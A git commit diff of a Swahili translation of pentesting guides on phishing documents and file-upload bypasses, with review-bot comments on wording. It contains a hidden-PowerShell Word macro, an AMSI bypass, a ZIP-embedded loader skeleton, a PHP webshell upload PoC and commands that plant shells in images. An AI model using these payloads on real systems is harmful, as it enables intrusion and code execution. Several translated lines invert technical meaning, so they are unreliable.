Translated ['', 'src/windows-hardening/ntlm/places-to-steal-ntlm-creds.m

This commit is contained in:
Translator 2025-09-30 04:41:00 +00:00
parent b5a11881b9
commit a2b8389687
4 changed files with 242 additions and 153 deletions

View File

@ -1,20 +1,20 @@
# Faili na Nyaraka za Phishing
# Phishing Files & Documents
{{#include ../../banners/hacktricks-training.md}}
## Nyaraka za Office
## Office Documents
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiiki wa data unafanywa kwa njia ya utambuzi wa muundo wa data, kulingana na viwango vya OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa.
Kwa kawaida, faili za Word zenye macros zinatumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\
Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\
Mekanismi na vipengele vya ndani sawa vinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Kwa kawaida, faili za Word zenye macros zinatumia ugani `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha ugani wa faili na bado kuendelea kuwa na uwezo wa kutekeleza macros.\
Kwa mfano, faili ya RTF haitegemei macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macro.\
Mambo ya ndani na mifumo hiyo hiyo yanatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint etc.).
Unaweza kutumia amri ifuatayo kuangalia ni extension zipi ambazo zitatekelezwa na baadhi ya programu za Office:
Unaweza kutumia amri ifuatayo kuangalia ni ugani gani utakavyotekelezwa na baadhi ya programu za Office:
```bash
assoc | findstr /i "word excel powerp"
```
Faili za DOCX zinazorejelea kiolezo cha mbali (File Options Add-ins Manage: Templates Go) ambazo zina macros zinaweza pia “execute” macros.
Fayil za DOCX zinazorejelea remote template (File Options Add-ins Manage: Templates Go) ambazo zinajumuisha macros zinaweza pia kutekeleza macros.
### Kupakia Picha za Nje
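Review bot: L23 changes the meaning of the RTF sentence: "faili ya RTF haitegemei macros" says an RTF file does not depend on macros, while the line it replaces, "faili ya RTF haiungi mkono macros, kwa muundo" (L20), states that RTF does not support macros by design, which is the point of the example (a DOCM renamed to RTF still runs macros because Word handles it). Keep "haiungi mkono". The word chosen for "extension" in this hunk, "ugani" (L22, L26), should also be reconciled with "kiendelezi", which the same commit introduces further down the file (L56, L60), and with the plain English "extension" used on the upload page (L148, L151); one term throughout makes the book searchable.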
@ -25,16 +25,16 @@ _**Categories**: Links and References, **Filed names**: includePicture, and **Fi
### Macros Backdoor
Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye dokumenti.
Inawezekana kutumia macros kuendesha code yoyote kutoka kwenye hati.
#### Autoload functions
Kadiri zinavyokuwa za kawaida zaidi, ndivyo uwezekano wa AV kuzitambua.
Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua.
- AutoOpen()
- Document_Open()
#### Mifano ya Macros Code
#### Mfano za Macros Code
```vba
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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")
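Review bot: L43 introduces a concord error in the heading: "Mfano za Macros Code" pairs the singular "Mfano" with the plural connective "za". The removed "Mifano ya Macros Code" (L42) was grammatically correct, so this change should be reverted.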
@ -64,14 +64,14 @@ Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
```
#### Ondoa metadata kwa mkono
#### Ondoa metadata kwa mikono
Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**.
Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itaonyesha Document Inspector. Bonyeza **Inspect** kisha **Remove All** karibu na **Document Properties and Personal Information**.
#### Ugani la Doc
#### Kiendelezi cha Nyaraka
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu inayohusiana na ugani unaounga mkono macro **`.docm`** (mfano ikoni ya thumbnail ina `!` kubwa na baadhi ya web/email gateway huzuia kabisa). Kwa hiyo, ugani wa zamani **`.doc`** ndio suluhisho bora.
Baada ya kumaliza, chagua kwenye **Save as type** dropdown, badilisha muundo kutoka **`.docx`** kwenda **Word 97-2003 `.doc`**.\
Fanya hivi kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu kiendelezi cha macro-enabled **`.docm`** (mf., ikoni ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/barua pepe huzuia kabisa). Kwa hivyo, **kiendelezi cha zamani `.doc` ndicho suluhisho bora**.
#### Malicious Macros Generators
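Review bot: L56 renders the "Doc Extension" heading as "Kiendelezi cha Nyaraka" ("document extension"), but the subsection is specifically about the `.doc` format (L59-L60 tell the reader to switch the save type to Word 97-2003 `.doc`), so "Kiendelezi cha `.doc`" would be accurate. L60 also carries the apostrophe typo "macro's" inside the bold phrase "huwezi kuhifadhi macro's ndani ya `.docx`"; "macros" is meant. And "kiendelezi" in L56/L60 is a second term for what L22 and L26 of the same file call "ugani"; pick one.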
@ -81,9 +81,9 @@ Fanya hivi kwa sababu wewe **can't save macro's inside a `.docx`** na kuna aibu
## Faili za HTA
HTA ni programu ya Windows ambayo **inachanganya HTML na lugha za scripting (such as VBScript and JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "fully trusted", bila vikwazo vya modeli ya usalama ya browser.
HTA ni programu ya Windows ambayo **inachanganya HTML na scripting languages (such as VBScript and JScript)**. Inaunda user interface na inatekelezwa kama programu "fully trusted", bila vikwazo vya browser's security model.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **huwekwa** pamoja na **Internet Explorer**, na hivyo kufanya **`mshta` dependant on IE**. Hivyo, kama imeondolewa, HTA hazitaweza kutekelezwa.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kawaida huwa **imewekwa** pamoja na **Internet Explorer**, na kufanya **`mshta` dependant on IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa.
```html
<--! Basic HTA Execution -->
<html>
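Review bot: L65 moves "user interface" and "browser's security model" back to English inside a Swahili sentence, where the removed L64 had "kiolesura cha mtumiaji" and "modeli ya usalama ya browser"; keep the Swahili forms so the sentence is in one language. Both L66 and L67 keep the bold "**`mshta` dependant on IE**"; the adjective is "dependent". While this block is open, the unchanged L69 `<--! Basic HTA Execution -->` is not valid HTML comment syntax (it should be `<!-- Basic HTA Execution -->`), and fixing it here costs nothing.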
@ -138,11 +138,11 @@ var_func
self.close
</script>
```
## Kulazimisha NTLM Authentication
## Kulazimisha Uthibitishaji wa NTLM
Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji ataziingia (hata HTTP MitM?). Au mtume mwathiriwa **anuani ya faili** ambayo itawasha **authentication** kwa kufungua folda tu.
Kuna njia kadhaa za **kulazimisha uthibitishaji wa NTLM "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifikia (hata HTTP MitM?). Au kumtumia mwathiriwa **anwani ya faili** ambayo itasababisha **uthibitishaji** kwa tu **kufungua folda.**
**Angalia mawazo haya na zaidi katika kurasa zifuatazo:**
**Angalia mawazo haya na mengine katika kurasa zilizo hapa chini:**
{{#ref}}
@ -156,24 +156,24 @@ Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, u
### NTLM Relay
Usisahau kwamba huwezi kuiba tu hash au authentication, bali pia **perform NTLM relay attacks**:
Usisahau kwamba huwezi tu kunakili hash au authentication, bali pia **perform NTLM relay attacks**:
- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk yenye madhara. Njia ni kwamba PowerShell loader mwenyewe imehifadhiwa ndani ya raw bytes za ZIP baada ya marker maalum, na .lnk huichonga na kuiendesha yote ndani ya memory.
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk ya hatari. Njia ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama maalum, na .lnk inachonga na kuikimbiza yote katika kumbukumbu.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent ya current working directory.
2) Soma bytes za ZIP na upate marker iliyowekwa (mfano, xFIQCV). Kila kitu kilicho baada ya marker ni PowerShell payload iliyowekwa.
3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ionekane halali.
4) Kwepa AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate stage inayofuata (mfano, ondoa wote # characters) na uitekelleze ndani ya memory.
1) Tafuta ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent wa current working directory.
2) Soma bytes za ZIP na tafuta marker iliyo hardcoded (mf., xFIQCV). Kila kitu baada ya marker ni embedded PowerShell payload.
3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ili ionekane halali.
4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (mf., ondoa characters zote za #) na execute ndani ya kumbukumbu.
Example PowerShell skeleton to carve and run the embedded stage:
Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa ndani:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
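Review bot: L85 weakens the claim: "huwezi tu kunakili hash" means "you can not only copy the hash", whereas the removed L84 "kuiba" (steal) matches the section, which is about stolen authentication being relayed; keep "kuiba". L90 has a similar verb problem: "kuikimbiza yote katika kumbukumbu" means "chase it all away in memory"; the intended "run it entirely in memory" is "kuiendesha yote ndani ya memory", as L89 had it. L97 also switches L92's "parent ya" to the animate concord "parent wa" for a directory, which reads oddly.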
@ -191,8 +191,8 @@ $code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
Invoke-Expression $code
```
Notes
- Usambazaji mara nyingi hutumia vibaya subdomains za PaaS zenye sifa nzuri (mfano, *.herokuapp.com) na inaweza kuweka vizuizi kwa payloads (kutoa ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza alama kwenye diski.
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
- The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimize disk artifacts.
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
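Review bot: The two versions of the Notes bullets are in different languages: L111-L112 are Swahili, L113-L114 are word-for-word English. On a page whose body is Swahili, the English pair leaves the Notes list untranslated, and the unchanged lines that follow ("Persistence used in the same chain" at L115 and the COM TypeLib bullet at L116) are English as well, so this section ends up only partly translated. Keep the Swahili bullets and translate L115-L116 in the same pass.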
@ -207,7 +207,7 @@ Hunting/IOCs
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Long-running business threads ending with links hosted under trusted PaaS domains.
## Windows files to steal NTLM hashes
## Faili za Windows za kuiba hash za NTLM
Angalia ukurasa kuhusu **places to steal NTLM creds**:
@ -216,7 +216,7 @@ Angalia ukurasa kuhusu **places to steal NTLM creds**:
{{#endref}}
## Marejeo
## References
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
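Review bot: Heading language is inconsistent across this file: L126 turns "## Marejeo" into the English "## References", and the same commit goes from "# Faili na Nyaraka za Phishing" to "# Phishing Files & Documents" (L12-L13) and from "## Nyaraka za Office" to "## Office Documents" (L15-L16), while elsewhere it moves headings the other way, into Swahili ("## Kulazimisha Uthibitishaji wa NTLM" at L76, "## Faili za Windows za kuiba hash za NTLM" at L121). Settle on one language for headings. Changing heading text also changes the slug that other pages link to; L86-L87 show exactly this kind of heading-derived anchor (`#ntml-relay-attack`, `#ntlm-relay-to-ad-cs-http-endpoints-esc8`), so any incoming links to renamed headings need checking.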

View File

@ -2,12 +2,12 @@
{{#include ../../banners/hacktricks-training.md}}
## Mbinu za Jumla za Kupakia Faili
## Mbinu Za Kawaida za Kupakia Faili
Other useful extensions:
Nyongeza nyingine muhimu:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, .php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **Kufanya kazi na PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
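Review bot: L140 fixes `_.php5_` but leaves `.phtml_, .module_, .inc_, .hphp_, .ctp_` with unmatched underscores, so the line still renders with stray italics; the unchanged L138 has the same problem (`._php4_, ._php5_ ... .phtml_`). Wrap each list in a single pair, as L141-L143 do (`_.asp, .aspx, ... .shtml_`). L137 also translates "extensions" as "Nyongeza" ("additions"), while the same commit replaces "nyongeza" with the English "extension" elsewhere in this file (L148, L151, L152); use the same term in both places.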
@ -15,13 +15,13 @@ Other useful extensions:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Kupita ukaguzi wa nyongeza za faili
### Kupita ukaguzi wa extensions za faili
1. Ikiwa zinatumika, **angalia** **nyongeza zilizotajwa hapo awali.** Pia zipime kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza nyongeza halali kabla ya** nyongeza ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
1. Ikiwa zinahusika, **angalia** **extensions zilizotangulia.** Pia zijaribu kwa kutumia baadhi ya **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla ya** extension ya utekelezaji (tumia extensions zilizotangulia pia):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ASCII** na **Unicode**. (_Kumbuka unaweza pia kujaribu kutumia **nyongeza** zilizotajwa **hapo awali**_)
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa **hapo awali**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
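Review bot: L156 lowercases the acronym to "**ascii**" where the removed L155 had "**ASCII**"; keep the uppercase form, which also matches the capitalised "**Unicode**" beside it.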
@ -31,7 +31,7 @@ Other useful extensions:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita vizingiti kwa **kuudanganya extension parser** upande wa server na mbinu kama **kurudia** nyongeza au **kuongeza data zisizohitajika** (byte za **null**) kati ya nyongeza. _Unaweza pia kutumia **nyongeza zilizotajwa hapo awali** kuandaa payload bora._
4. Jaribu kukwepa ulinzi kwa kudanganya parser ya extension upande wa server na mbinu kama **kuzidisha** **extension** au **kuongeza takataka** data (**null** bytes) kati ya extensions. _Unaweza pia kutumia **extensions zilizotangulia** kutengeneza payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
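Review bot: L165 replaces "kurudia" (repeating the extension, L164) with "kuzidisha", which means multiplying or increasing; the examples that follow (`file.png.php`, `file.png.pHp5`) show repetition, so keep "kurudia". L165 also drops the bold that L164 had on the key phrase ("**kuudanganya extension parser**"), so the technique name no longer stands out in the numbered list.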
@ -40,13 +40,13 @@ Other useful extensions:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka lingine la nyongeza** kwenye ukaguzi uliopita:
5. Ongeza **safu nyingine ya extensions** kwenye ukaguzi wa awali:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **nyongeza ya utekelezaji kabla ya nyongeza halali** na uombe server iwe misconfigured. (inafaa kutafuta misconfigurations ya Apache ambapo chochote chenye nyongeza **.php**, hata kama si lazima kinaishie kwa .php, kitaweza kuendesha code):
6. Jaribu kuweka **exec extension kabla ya extension halali** na utuamini server imepangwa vibaya. (inayofaa kutekeleza misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini si lazima kikamilike kwa .php, kitatekeleza code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, tabia ya kolon ":" itaingizwa baada ya nyongeza iliyokatazwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye nyongeza iliyokatazwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia jina fupi la faili. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia inaweza kuwa muhimu kupita vikwazo zaidi (mfano "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Nyongeza halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile inayoruhusiwa. Kutokana na hilo, faili tupu lenye extension iliyoruhusiwa litasanywa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia kunaweza kusaidia kukwepa vikwazo zaidi (mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali itakatwa. Na PHP ya hatari itabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
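Review bot: L182 inverts the ADS description: "itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile inayoruhusiwa" places the colon after an allowed extension and before an allowed one, and "faili tupu lenye extension iliyoruhusiwa" says the empty file gets the allowed extension. The removed L180 had it right: the colon goes after the forbidden extension ("iliyokatazwa") and before the permitted one, and the empty file is created with the forbidden extension, which is the only reading under which the `file.asax:.jpg` example on the same line makes sense. L182 also contains "litasanywa", which is not a word; L180's "itaundwa" (will be created) is the verb. Separately, L178 replaces L177's "uombe server iwe misconfigured" with "utuamini server imepangwa vibaya", and "utuamini" ("trust us") does not fit; its "inayofaa kutekeleza misconfigurations ya Apache" also says the trick executes the misconfiguration rather than looks for it, where L177's "inafaa kutafuta" was the intent.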
@ -61,13 +61,13 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers hukata au ku-normalize nukta za mwisho (trailing dot) kutoka kwa jina la faili lililohifadhiwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) toleo kabla ya 2.9.1, unaweza kupita ukaguzi wa nyongeza kwa:
Baadhi ya upload handlers huondoa au kurekebisha pointi zinazofuata kutoka kwa jina la faili lililosalishwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kukwepa uthibitishaji wa extension kwa:
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuiruhusu jina la faili iliyopakuliwa kuwa na nyongeza ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server hutakata nukta ya mwisho na kuhifadhi `shell.php`, ambayo itaendeshwa ikiwa itakapowekwa katika directory inayotumika kwa web (stora ya umma ya default kama `/storage/files/`).
- Kuita jina la faili iliyopakuliwa kwa extension ya PHP ikifuatiwa na nukta, mfano `shell.php.`.
- Server inakatakata nukta inayofuata na kuhifadhi `shell.php`, ambayo itaendesha ikiwa imewekwa katika directory inayotumiwa kwa web (default public storage kama `/storage/files/`).
Minimal PoC (Burp Repeater):
PoC ndogo (Burp Repeater):
```http
POST /profile/avatar HTTP/1.1
Host: target
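Review bot: L189 uses "jina la faili lililosalishwa" for the persisted filename, but "kusalisha" means to lead prayers; L188's "lililohifadhiwa" (stored) is the right word. L189 and L194 also turn "trailing dot" into "pointi zinazofuata" / "nukta inayofuata" ("the following dot"), which loses the point that it is the final character of `shell.php.`; L188's "nukta za mwisho" keeps that. Note as well that L191 and L193 say "faili iliyopakuliwa" (downloaded file) where the uploaded file is meant ("iliyopakiwa", as L250 uses later in this file).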
@ -80,65 +80,65 @@ Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
```
Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):
Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
```
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Tekeleza strict server-side allowlists na thibitisha tena persisted filename.
- Serve uploads kutoka maeneo yasiyo-executable.
- Sasisha unisharp/laravel-filemanager to ≥ 2.9.1.
- Enforce strict server-side allowlists and re-validate the persisted filename.
- Tumikia uploads kutoka maeneo yasiyo-executable.
### Kuepuka Content-Type, Magic Number, Compression & Resizing
### Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (ili kudanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kuwatatanisha amri ya _file_). Au weka shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya image:\
`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression inayoletwa kwenye image yako**, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitatumika. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Ikiwa **compression inaongezwa kwenye picha yako**, kwa mfano kwa kutumia baadhi ya maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitakuwa za msaada. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanyia **resizing** image, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Tovuti pia inaweza kuwa iki**resize** picha, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kutengeneza payload inayestahimili image resizing, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- Mbinu nyingine ya kutengeneza payload ambayo **inadumu baada ya image resizing**, ikitumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayodumu baada ya compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Mbinu Nyingine za Kuangalia
- Tafuta udhaifu wa kubadilisha jina la faili iliyopakuliwa tayari (ili kubadilisha extension).
- Tafuta Local File Inclusion vulnerability ili kutekeleza backdoor.
- **Possible Information disclosure**:
- Tafuta udhaifu wa **kubadilisha jina (rename)** kwa faili ambayo tayari imepakizwa (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kuendesha backdoor.
- Uwezekano wa kufichuliwa kwa taarifa:
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina moja**
2. Pakia faili yenye **jina** la **file** au **folder** ambalo **tayari lipo**
3. Kupakia faili yenye majina ya `"." , "..", or "…"` kama jina lake. Kwa mfano, kwenye Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, jina la faili "." litaunda faili liitwalo "uploads" katika directory "/www/".
4. Pakia faili ambayo inaweza isiwe rahisi kufutwa kama **"…:.jpg"** kwenye **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia **reserved** (**forbidden**) **names** kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia an executable (.exe) au `.html` (inayoonekana isiyoshtua) ambayo itatekeleza code inapofunguliwa kwa bahati mbaya na mwanaathiriwa.
2. Pakia faili lenye **jina** la **faili** au **folda** ambayo tayari ipo
3. Kupakia faili yenye **"." , "..", au "…" kama jina lake**. Kwa mfano, kwenye Apache katika **Windows**, ikiwa application inaweka faili zilizopakiwa katika saraka "/www/uploads/", jina la faili "." litaumba faili liitwalo "uploads" katika saraka "/www/".
4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **herufi zisizokubalika** kama `|<>*?”` kwenye jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia majina yaliyohifadhiwa (yaliyoruhusiwa kutumika) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoonekana isiyo hatari) ambayo **itaendesha code** inapofunguliwa kwa bahati mbaya na mwathiriwa.
### Special extension tricks
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
